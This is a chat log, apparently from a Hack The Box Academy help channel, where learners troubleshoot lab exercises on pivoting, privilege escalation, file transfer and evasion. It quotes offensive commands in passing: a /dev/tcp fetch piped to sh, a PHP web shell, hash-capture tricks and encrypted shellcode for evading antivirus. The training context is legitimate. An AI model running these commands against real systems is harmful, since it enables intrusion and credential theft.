Certificate Request Processor: ASN1 bad tag value met. 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
can someone help me fix this?
from the course: "If you get an error when running certreq.exe, the version you are using may not contain the -Post parameter. You can download an updated version"
cant post the exe link here
did you try it?
yes but windows box can't access internet
that's the first thing I tried
can't you transfer the file? in a file transfer module .. 
The target boxes can't access the internet goober
That's a lot of extra work tbh
not for me
this is what I think too I already thought of that
I'd skip this method then
ok I'll just skip it ya thanks
Tbh
I guess that's what I did..
that's bad advice
its not bad advice because I get how to do it anyways
and if not, I'll be doing it again later in the CPTS course as part of more advanced modules. But I get the idea.
you don't need to know every method ¯_(ツ)_/¯
I tried all the wrappers, I don't see any other way
Most flag locations are under /flag.txt for these, does the question give you a location?
yes, it says find the flag in the / root directory
So... why not try /flag.txt instead of /etc/passwd
nothing echos
A lot of the pentesting / bug bounty modules are pretty straightforward....but then again I over complicate things
Hi, everyone!
Someone solved dynamic analysis in evasion techniques module?
what up gangstas
Hello guys, hope you are doing well!
I am spending my second day searching for an answer for this task, I would highly appreciate your assistance on that.
**WINDOWS EVENT LOGS & FINDING EVIL - Skills Assessment - Task 1**
By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe
- I configured the sysmonconfig-export.xml (to catch Event ID 7 logs)
- I wrote an XML query which shows me Event ID 7 logs with Signed: False
There are only 14 logs, all with mmc.exe, which is not the real answer. How can I solve this?
Thank you in advance!
is there another workaround for rdp timeouts? I'm using timeout/80000 & I still get [13:55:10:400] [42933:42935] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
Should be /timeout:80000
But also try resetting your vm
Could be some cache thing being dumb, also try resetting target, changing vpn regions
looks like my meterpreter died, working on that rn
https://academy.hackthebox.com/module/77/section/843 I'm doing this task:
I got as far as this, using the msfconsole module for WP backup. My question is, it defaults to downloading /etc/passwd, which is for logging into the system via SSH I guess. Read shadow/passwd, unshadow and crack it, or use CrackStation?
OR...
Somehow I'm supposed to download a wp backup and get the wp db, and get the admin password so I can login and get the flag?
I'm confused as to what I'm supposed to do here.
Hmm. It reads passwd, but not shadow. So I'm guessing it runs as the www-data user or something, and doesn't have access to read the shadow file.
Read the task again, you don't need the backup or db file
Oh I got ya
Also check options
👍
Thank you
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/ I used this link to figure out how to use msfconsole to find the exploit
Umm, I can safely say you overthought this lol. After you configured the sysmonconfig, did you try viewing the event ID in Event Viewer?
As a note, be prepared to research things if you don't get it at first
Can someone help me with this question of the Broken Authentication module?:
On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?
It does not specify in which format it has to be entered or whether it is lowercase or not. I have been trying different ways for a while and it does not accept my answer.
thank you, it was my English problem
Sorry, I didn't understand you. Do you mean, have I tried to search for Event ID 7?
Yes. After you configured the Sysmon config, did you search for the event ID in Event Viewer?
If I remember correctly there are a lot of Sysmon Event ID 7 entries in the logs. You are looking in the right place. I tried as well with XML, but I had better results with another Get-WinEvent method. I had to google a bit to fine-tune the command.
just curious.... I tried capturing a hash by executing xp_dirtree from the MSSQL server and using impacket-smbserver
[*] User WIN-HARD\ authenticated successfully [*] :::00::aaaaaaaaaaaaaaaa
that's what i captured
wondering what it means when we don't see any user being authenticated
it doesn't really matter for the challenge i';m on i think but i'm just curious
what module and section?
I was working on the "Attacking Common Services" section hard lab
In the Attacking Databases quiz I did successfully capture a hash for the mssqlsvc account using this technique
I didn't actually need to do this to complete the hard lab
I just wondered what it meant when the hash was basically empty
ah
maybe null login
yh
curious i had not seen that before
I think i should probably submit an errata for the solutions of the medium lab
there's an errata channel somewhere right?
found it
it might be intentional so idk
¯_(ツ)_/¯
i remember not needing the hash for mssqlsvc for that exam
rather needing to do something completely different
I'm doing an exam currently and I have a problem with the submission.
Where I can contact an administrator?
message support on the website
there is no support for the exams on the discord
indeed :). I got there in the end
moving on to the network pivot module
is everyone just using ligolo-ng to do pivoting now?
no more ssh local port forwarding proxy chains etc.etc.?
I mean it's a lot simpler to use, but it's good to know multiple tools, in the event you only need something quick
For sure
https://academy.hackthebox.com/module/77/section/844
I am doing this task. I have started the machine and connected to it via SSH. I am not able to download linpeas.
I started a local Python HTTP server on my Parrot VM: python3 -m http.server on 8000
I SSH into the target machine with user1.
I do wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh or wget http://my.vpn.ip:8000/linpeas.sh and it just never connects.
What am I doing wrong, if anything? Do the machines not have any internet connectivity?
machines do not have internet connectivity
is linpeas in the directory you launched the http server from?
Yes. It's not that it is a 404 Not Found, it's that it times out trying to connect to my VPN tun0 IP
http.server serves the directory you're in (and any subdirectories)
try:
- resetting the target
- changing vpn regions
- use SCP to copy the file over (syntax SCP source destination)
linpeas is absolutely not required lol
Locally:
$ sudo nc -q 5 -lvnp 80 < linpeas.sh
listening on [any] 80 ...
On target:
cat < /dev/tcp/10.10.14.125/80 | sh
It times out.
I've tried multiple methods.
I also did nc -vz myvpnip 80 and nothing. Netcat logs nothing incoming
and can often spit out a lot of info that makes no sense and only a few bits of relevant info
plenty of other methods to list what your user might be able to (su)do
I tried: find / -type f -perm -04000 -ls 2>/dev/null to list all SUID binaries, then on GTFOBins I tried whatever I found; it keeps saying user1 is not allowed to execute. I'm trying. Let's see
you're overcomplicating it
sudo -l 😉
also this one is a publicIP:port; so you won't be able to get a reverse connection
Oh hang on.
see: User Privileges Subsection
It's not a VPN machine. It's just a container, I think, on a random port, so it won't connect back to the VPN; that's why.
Oh you just said that 🙂
Thanks
yeah
the User Privileges Subsection details stuff you can do btw 😉
almost exactly
So I don't really need the VPN for academy, do I? VPN is for main site?
you gotta get from user1 → user2 then user2 → root
Ok I'll try more, thanks
you still need vpn, it's just this question doesn't use it
Oh ok.
→ 10.129.x.x = VPN required
→ PublicIP:Port = No VPN (and no reverse connections)
I did sudo -l already and I can't run anything as sudo.
user2 has NOPASSWD on /bin/bash, so he can launch bash with his sudo access and get a root shell, np. But I'm stuck on user1 😦
OMG
I suck at reading.
User user1 may run the following commands on ng-1014841-gettingstartedprivesc-hjrlt-546d885f89-tqjlm:
(user2 : user2) NOPASSWD: /bin/bash
user1@ng-1014841-gettingstartedprivesc-hjrlt-546d885f89-tqjlm:~$ sudo /bin/bash
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/bin/bash' as root on ng-1014841-gettingstartedprivesc-hjrlt-546d885f89-tqjlm.
hmmmm.
reread the subsection i said earlier
I read it twice. I'll do it again
it shows what to do when you see (for example) (user:user) NOPASSWD /bin/*
yep
Thanks duder
For Attacking Common Applications - Attacking Thick Client Applications, I'm unable to get the .bat file to populate after changing the user's temp folder permissions. Any ideas as to what I might be missing?
I completed file transfers module
You know what, I might try the academy section out and see how well it helps me.
Module: Password Attacks -> Attacking SAM.
Anyone know how to transfer files from a Windows (RDP-connected) machine to a local Kali VM running smbserver.py? I'm trying to use 'move' from the Windows machine with the private OpenVPN IP to connect back to the Kali VM, but it's unable to recognise the machine.
Hello, I am in the Introduction to Windows Evasion Techniques static analysis section and have been stuck for the past few hours. I am AES-encrypting my payload and using the same format as shown in the module example, but when I compile and run the program I keep getting the same error. The error says it's a padding issue, so I tried various types of padding but nothing worked. Could anyone please tell me what I am doing wrong?
there are multiple ways to transfer the files, regarding the one you are trying you might need to map the share before accessing it:
net use n: \\10.10.10.10\<share-name>
then you should be able to access the share
I would prefer to use copy over move
you also can change the letter n to your convenience
sometimes Windows requires a user and password to be set on an SMB share, but that might not be the issue in your case
did you remove the new lines in your input? also your shellcode size seems off
I did. Also, the size seems off because I'm using Sliver stager shellcode. But I tried it with Meterpreter too and it didn't work
Thanks for the response, unfortunately the net use command is still giving the "network path was not found" error.
the output also seems off
you don't have to use net, just the network path should do \\ip\share
Yeah it's the same error. It cannot find the network path. I'm following the instructions set out in the module using CompData as the share.
can the target reach your smb server?
I'm able to ping the OpenVPN private IP from the Windows machine
works fine for me, you should see something pop up in your smbserver if the connection is successful
mm okay, I tried to copy what you've done here but I still get the same error. Are you running smbserver from a VM or from your local OS?
Yeah, you're right. I tried encrypting with the key and IV in the module and am getting a much different result. Any idea what I'm doing wrong?
It's disabled on the Windows machine. I'm using a macbook pro so not sure if there is some config that may be causing the issue.
your key and IV should be a 16-byte hex string, so you'll want to remove the 0x and commas
running in a vm?
The Windows machine is a VM (HTB machine), MacOS is my local OS and Kali is my hacking VM. I'm using OpenVPN Connect (Desktop GUI) to connect to the HTB network.
hold on, where is openvpn running? on your host or kali?
On my host
yep, that's the problem: the target has no way of reaching the smbserver on your Kali since they're different interfaces
always connect to the vpn in kali itself
CyberChef automatically converts it, but anyway I tried it and it doesn't change anything
Ah okay awesome, that makes sense. I'll give it a go now. I've been doing most of the machines from my Mac, just that smbserver.py wasn't working on MacOS so I jumped over to Kali for this module.
Module: Password Attacks
Section: Password Mutations
Referring to the previous conversation, I gave up attacking the SSH port and went for the SMB port instead with NetExec
hydra returned that the SMB port can accept any password, while that isn't the case in reality (neither SAM with any "successful" attempts shown in hydra, nor a null session can get me into the SMB server via smbclient)
Still, I can somehow list shares via a null user in NetExec. Is there anything I missed again?
(PS: I am using the mutated wordlist generated with the example command hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list)
never mind, I saw that's another surface I can touch
put the shellcode on pastebin or something and send it here
Ok, so I've figured out the problem is the content isn't being encrypted. But idk why. If I change anything in the key it doesn't work
So i dont think key is the problem
All working now, thanks for the help! You're a legend!
yep thought so, your output looked weird
xfreerdp has the /drive: option
btw
How come the Windows Privilege Escalation doesn't have any service binary hijacking or unquoted service paths? Did I miss something?
those are covered in the Weak Permissions section of the module
Thank you
I GOT IT TO WORK!! The problem was so dumb... the output format was set to hex in CyberChef and that was messing with everything
Thanks for everything!
why am I getting fuzzed in all payloads? In Using Web Proxies - ZAP fuzzer
oops I missed that too, glad you figured it out
read the task so you know what you're also fuzzing for; iirc it gives you some text to also match for with the wordlist once you get in
I am doing the LFI module, and for some reason when I encode echo '<?php system($_GET["cmd"]); ?>' to base64 I get a different result if I encode it to base64 with Burp or CyberChef compared with encoding it from the terminal
anyone faced something like this ?
If you pipe the output from echo … to base64, there will be a newline character at the end that's included in the base64 output. Use echo -n … and the base64 should match the one from CyberChef / Burp
Cool thanks, will check it out
yeah I tried with -n and it still did not match
nvm fixed now, I was adding extra quotes
DM me if you want to discuss this ^^
hey, could you remove the command you used, as it an answer for a skill assessment
this is a spoiler for the assessment; please refrain from posting these
Why am i banned ?
https://academy.hackthebox.com/module/67/section/1637
Windows PrivEsc - Pillaging Section
I have 1 question left: to find the hashes by restoring a backup (that used rustic). I have restored all available backups but can't find any of the hashes. Even in the walkthrough, the backup of \windows\system32\config, where the hashes would be, can't be backed up due to permissions.
so despite going through the steps many, many times, I can't figure out what I'm meant to do?
Sorry, I didn't know about this regulation.
can't remember exactly how I did it but I'm thinking about sam and system hives
hi
yea i figured, but where?
I'm having trouble getting the credentials supplied in question 2 of module Pivoting and Tunnelling section SSH local port forwarding and SOCKS proxy to work.
I have connectivity to the host with RDP but the credentials supplied don't seem to work
Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
i used victor as username and pass@123 as password
you got that Jeff password, is he able to create new backups? like a VSS of C:?
yea, which I've done, but he can't write the config directory that would have the hashes
you → host1 → host2 → host3
if you read carefully, there's another system in the middle there that they give you creds for
i'll stop here, i might be in a rabbit hole
ok. but where am i meant to look?
ive restored all of the backups and found nothing
i can't tell without redoing the exercise and i can't do it at the moment.
I do not take precise notes on them if there is no new tricky thing straying off the course material, just because I don't want to focus too much on past results when facing a new problem. I might give it a go later if you're still stuck
no prob. and i probably will. ive been doing it for a while lol
lol my rabbit hole is: not focusing on the config directory but trying to get access to the hives in system32. But as I said, I don't remember the particularities of the exercise, so it might be completely off track
the hive files are in the config directory though
meh
you mean the ssh creds for the pivot host?
read the section carefully
ok
so if you restore config directory like the 'restore' part of the course?
unless I'm misunderstanding which section you're on
in which case it helps to provide the section name
not "question 2" and stuff like that
yup. exactly as shown, and its an empty folder
I am on the section titled "Dynamic Port Forwarding with SSH and SOCKS Tunneling"
third section in the pivot and tunnel module
the question asks us to use the pivot host to rdp onto a host on the internal network.
lol ok i'm done for now, i've to go and i can't wrap my head around it without trying it, cheers mate
yea thats alright. im resetting the target. and will keep trying
all the other questions were easy for me, but this 1 has been a pain lol.
ah my bad i was thinking of the double pivot section where most other people get stuck
no worries i wasn't very clear initially
i just did a local port forward to achieve the connectivity and seems to work fine
i get rdp connection etc.
just the creds provided don't seem to work
they should work
ok, unless i am rdp'ing onto something else... not sure how
ah
no it's not localhost:1234
it's the targetIP 1234
iirc
either way it's something that's awkward to do
mmmm well target IP is not reachable directly
yes
so we forward a local port using ssh
you need to use a dynamic chain
well that's what i did
or is that impossible
so localhost:1234 will be forwarded over the tunnel to targetIP:3389
this is not that kind of server, and i suggest you not ask others to perform illegal actions
ssh -L 1234:172.16.5.19:3389 ubuntu@10.129.203.158
the SSH client on my machine should forward all packets received on localhost 1234 over the tunnel to the destination IP
of course we can also use proxychains etc.
but i don't believe it's necessary for this question
-D 9050 and edit your proxychains.conf, ensure that only the socks4 9050 is uncommented out at the end
proof doing it that way works
ok i must be missing something in my understanding
the hint of what you need to do is in the section title DYNAMIC
it just doesn't make any sense to me
why would i need to do dynamic port forwarding. when i only need to forward to one destination port
i'm gonna do it that way anyway
perhaps i'm getting rdp access to some other box!
well the box you need to gain access to is a different box entirely
yes
but i get the rdp interface
so i'm assuming it's the right box
but maybe there's another box with an rdp listener
it should be the right box
i’ve just done an unauthenticated rce exploit, how do i actually gain the initial foothold? do i need to run a reverse shell?
you wouldn't be able to access it if it wasn't
helps to know what academy module you're working on champ
and reverse shells are an it depends type thing
if on Academy and it's a public_IP:port, you're gonna have a hell of a time trying to get a revshell to run
also if you have RCE, why not just look for files
¯_(ツ)_/¯
haven't used rdesktop before so idk how it works
got a question about the last hop of the skills assessment for the pentester path lateral movement module: I've got an open RDP session tunneled over SSH, and I'm trying to discover alive hosts on the 172.16.6.0/23 subnet, which I assume is where the domain controller is going to be, but I'm not seeing other hosts responding to my ping sweeps other than the hosts that I've already compromised. I've used a PowerShell one-liner to ping the network range, and the post/multi/gather/ping_sweep module in Meterpreter, but neither has revealed any new hosts. Is there something that I'm overlooking here?
but yeah requesting localhost:1234 @zealous rune after setting it up your way and that also works
but tbh your way really only works if you know for sure where you're sending things
well yh
if you need to go through multiple machines, dynamic is just better
we do in this case because it's defined for us
we have the IP:port
UNLESS YOU NEED TO FORWARD SPECIFIC PACKETS TO PORTS
depends innit
nah
-D is just better overall, you don't gotta do it for each individual item/port combo
dynamic is necessary when u don't know which destination ports u need to forward to
listen
let's agree to disagree until you can get through a day without ramming headfirst into a wall :)
but if u know you want to access a specific destination IP on a specific destination port then a simple ssh local port forward will suffice
😄
i like elegance and simplicity 🙂
let's agree to disagree
if you are referring to the Windows Lateral Movement module, it is not part of any path as of yet
-L is not elegant LMAO
@fathom pendant thanks for the hints as always
btw to show I did both ways
either way; first try all methods before trying to brute force another
nah not the Windows one, the pivoting tunneling and port forwarding one for CPTS. apologies for the confusion 😅
the last question? you don't need to do another hop
it's just that using ssh -L 1234:172.16.5.19:3389 ubuntu@10.129.203.158 has less moving parts than adding proxychains.... I'll leave it there
i mean in general proxychains is like one line to edit
instead of needing to remember which IP; port; etc you're forwarding
and is less prone to typos
I am getting this response when I try to ping the target in one of the htb academy module. I have my vpn on.
don't rush to the discord when you hit the wall
reset the target
Worked! Thank you.
slogging my way through the file inclusion module wooo
I won't
solved my own problem. i was on the second-to-last question that told me to make a final hop using a "common remote access solution", and for some reason the ping_sweep module didn't pick up the hosts on the 172.16.6.0/23 subnet the first time, but i ran it again and it found them the second time. i can see now that it wasn't really a "hop" per se
btw i believe the diagrams in the pivot and tunneling module could represent things "better"
they're a bit confusing
it's honestly just best to do the sweep from the host
so you're not relying on the proxy to not drop connections
yeah that's possibly what happened the first time
although i was running the powershell ping sweep on the host and it didn't find anything either
also sometimes it's just dumb like that
¯_(ツ)_/¯
it's also possible you just overlooked it
it's overall dumb
i mean possibly, staring at the terminal for too long makes me see funny sometimes, but i'm pretty sure i didn't miss anything
oh well, i got there in the end
read and follow the instructions in #welcome
it happens lol i remember one module where the pw was in the secretsdump output...plain text and everything ¯_(ツ)_/¯
Ah ok so i was just tweaking 😂 i use to have access to all of the available chats to us lul
Thanks
tbh i overlook IPs all the time lol. i'll try and run something and when it doesn't work i'll realise i fat fingered the IP
yeah i was doing that a minute ago; i have a keypad on my keyboard and went to type 36. my hand was off by one and typed 25. instead 
you mean the Pivoting skill assessment?
lateral movement is something else entirely
lateral movement is generally just moving to a different (non-admin) user that might have different rights than your current user
lateral is going up the chain (privesc) or down the chain (priv-deescalation)
yeah that makes sense. think it's one of those terms that's used interchangeably in infosec even though they're not really the same thing
like file inclusion and file disclosure
Hiiii all
Just curious why a kerberoastable user in the account operators group don't pop up/show that is in that group when using rpcclient to enumerate for groups that a user belongs to
this contains spoilers for password
i suggest redacting the password in the screenshot
since you have to crack the pw in one of the questions
in short though it depends* rpc doesn't always show all available info
as that service account is a DOMAIN USER technically so that's just what it gave
does it show up in other tools
So in the end I made a quick and dirty bash script that will try to create a "test file" in each folder/subfolder on an SMB server, then search for each successfully created "test file".
It works, but I still wonder if there isn't a script that already reliably does that (just "brute force" trying to create a file in each folder/subfolder on an SMB server).
PS: it uses smbclientng > python3 -m pip install smbclientng > https://github.com/p0dalirius/smbclient-ng
why use python3 -m pip install... instead of just pip3 install or pip install
I just pasted the instruction on the git page 🤷
I guess the author used this command for those reasons:
It doesn't really help for my problem though, like, nobody ever had this problem where they need to find a specific smb share subfolder with write access?
I just checked on the pwnbox and smbmap with recursive search also lists the folder with write rights as read only
why'd you specifically want write access? that wouldn't be too useful for the most part
and is the default list or tree not good enough?
The original message is here: #modules message
In this exercise you need write access to upload a .scf/.lnk file, so you can capture a NTLMv2 hash from a user browsing the share
tree doesn't even list rights, and ls doesn't seem to list the rights correctly (I assume ls list your rights to edit the folder, not your rights to create a file in the folder)
it follows windows permission ACL; write permission generally means you do have folder write access
i can't seem to be able to connect to my target. any1 else having issues?
Yea my target is stuck on respawning when I tried to revert the machine.
could just be that your region is getting congested
the day is just getting started
true
Hey! I have a question about Information Gathering - Web Edition: DNS Zone Transfers
I am able to perform the zone transfer, but I don't really understand what is asked in this question:
After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
i mean
it's asking how many records does the zone transfer give
yeah I should literally count unique records, but i dont know if i dont know how to count or i don't understand xd
name and address belong to one record
ikr
each name is a unique record
also with dig it tells you how many records were retrieved i believe
literally
and it outputs it in a more understandable/readable format than nslookup
ah maybe im missing the 2 nameserver records?
ill see with dig
it's why the section shows it
aight thanks xd
hi guys sorry for disorder, i think that i have a problem with my referral code, who can help me?
support
Need to speak to a person? Learn how to reach our support via HTB Labs.
thanks you so much
I was just looking at my badges and hmmmm seems like we know what the next module will be
oop webadmin skill issue
but nah the badges do tend to show up a bit before the actual module does
getting started > service discovering:
I do not understand why the credentials supplied work. Are these known credentials or just example credentials to show that maybe the samba service is not signing the stuff (sorry but I'm just a complete noob and it seems to me weird in the example that they don't explain how do they come up with bob:Welcome1) This is in the getting started section > service discovering, and they talk about samba.
They are just sample credentials
First they showed that a guest user cannot perform commands, and then are showing that with credentials a user is able to login and do commands like ls
this is one of the times where they hide credentials to do the task in the reading
but yes the example is showing sample credentials (also generally assume if htb highlights a user/pass combo then you should probably take note of it)
thank you so much, very weird. I do read stuff but I find that these details go over my head many times.
then take notes
notes are important to keeping things locked in
or at the very least keep them more engrained in your brain
when you say that I should take note of it, it means that it is important to remember that exact combo, or just be aware of it, I don't understand
as in note it down
write it down
explicitly given user:pass combos are good (generally) for the section
not overall
but for that section/module specifically they can be useful
always make a habit of recording/saving any found credentials
perfect, thank you!
you also don't need to thumbsup react everything lol
hello everyone, i am going through zone transfer - https://academy.hackthebox.com/module/144/section/1255
i have issues solving the first task which is performing a zone transfer.
from the example, this is how to perform a zone transfer dig axfr @nsztm1.digi.ninja zonetransfer.me
i found that @nsztm1.digi.ninja is the nameserver. so i did dig inlanefreight.htb NS to get the NS and i got this:
. 86400 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024072500 1800 900 604800 86400
so i entered: `dig axfr @nstld.verisign-grs.com inlanefreight.htb` but i got the error `dig: couldn't get address for 'nstld.verisign-grs.com': not found`
no you didn't find that
inlanefreight.htb isn't a publicly routed website so you won't find it on public servers, you need to do dig axfr inlanefreight.htb @ip for the spawned ip
(there's a reason there's a target spawn after all)
this response also means that it's not found; zonetransfer.me is not used for the answers
Introduction to Windows Command Line
For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them.
I've successfully found the flag but it is not submitting, keeps giving incorrect....anyways how can I SOLVE..this has happened sometimes before but now it is taking too long
Hello guys can anyone help ?
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
/module/112/section/2117
I tried :./odat.py all -s 10.129.205.19
make sure no extra spaces in your answer
odat won't give you the answer
read the section carefully once you have creds
hint it's in the format user/pass
still I'm typing the flag by my own, still not submitting
should i try sqlplus ?
it responded that connection to the ip of the spawned machine for inlanefreight.htb failed. host unreachable
this is after entering dig axfr inlanefreight.htb @ip for the spawned ip
sqlplus is how you interact with an oracle sql server
I did thanks
are you connected to the vpn?
i got the answer, i had to reset my spawned machine. thanks
what is this vulnerability called in nginx and is there any module explaining this
looks like lfi maybe
but idk; if that's an active box; kinda spoiler tbh
even still, spoiler
ok fine i deleted it i just wanna know if it is in any module
maybe look up some writeups and see if they identify it
not many web experts lurking in the academy chats tbh
it is not in academy modules?
idk ¯_(ツ)_/¯
looks like filter bypass maybe but again not sure and not speculating on a box in the academy channel
How do I fix this?
wrap password in single quote
okay
single quotes on password not double
yes
single quote tells bash to interpret the string as literal
thanks
double allows for variable expansion
got it. thanks for help frens
Hi, guys, I'm working my way through the Footprinting Lab-Easy /module/112/section/1078.
I had a peek at the walkthrough and, avoiding spoilers for others, it says I should have remembered a particular username and password combo. Anyone know where I was supposed to have seen that before?
And as soon as I type that, I find it. Feeling pretty stupid ngl. 😅
the exams are standalone from the module so to speak
you won't need any creds/info from earlier in the module for skill assessment
read the engagement brief
"additionally, our teammates..."
i have a question: "if i buy CPTS cost of 490$" will i get access to modules for lifetime?
Silver annual you mean?
if you don't complete the modules unlocked 100% you don't keep access to the modules once the sub ends
means after 100% i will not have access to modules right?
after 100% i will lose access.
I'm a student any suggestion for cheap price?
It's purely timed. You have a year access for your $490
I'm a student any suggestion for cheap price?
With a student email, you can get tier 2 access for pretty cheap. I don't know if it's cheaper than the 1 year silver though.
much cheaper
the only thing extra you gotta pay for is the exam voucher once you're ready
projected timeline 2-6 months; so $16-$48 + $210 is far cheaper
1 more question i know nothing, i'm full beginner so if i buy CPTS module contain everything that needed to pass cert?
and it will be beginner to advance?
the CPTS modules are enough to pass the exam, however if you've never even thought about a terminal in your life; the information security foundation path is the pre-requisite to the CPTS path
and contains a lot of fundamental info that later modules just assume you'd know
means
information security module then cpts module? all that?
path
not module
Information Security Foundations is a skill path that contains learning modules
and the Penetration Tester Job Role Path is what's required for the CPTS exam
hmmm apparently python2.7 is not in the parrot repos?
and apparently it's needed to be able to run rpivot
can you "sudo apt install python2.7" ?
nope
──╼ $sudo apt install python2.7
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package python2.7
E: Couldn't find any package by glob 'python2.7'
like it's been replaced by python3
compile from source then ... i guess
thanks @next bronze
https://gyazo.com/443190385e9e39e7d8c6652320c2296d i guess there is a syntax error somewhere doing the API attacks module
what am i missing, i created an xml entity called pwned at a doctype called pwn, called the entity in the reflected parameter so what am i doing wrong?
works in pwnbox, just paste the whole thing in and hit enter
